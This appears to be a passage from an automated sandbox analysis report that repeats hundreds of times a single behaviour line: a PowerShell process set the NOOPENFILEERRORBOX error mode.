                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
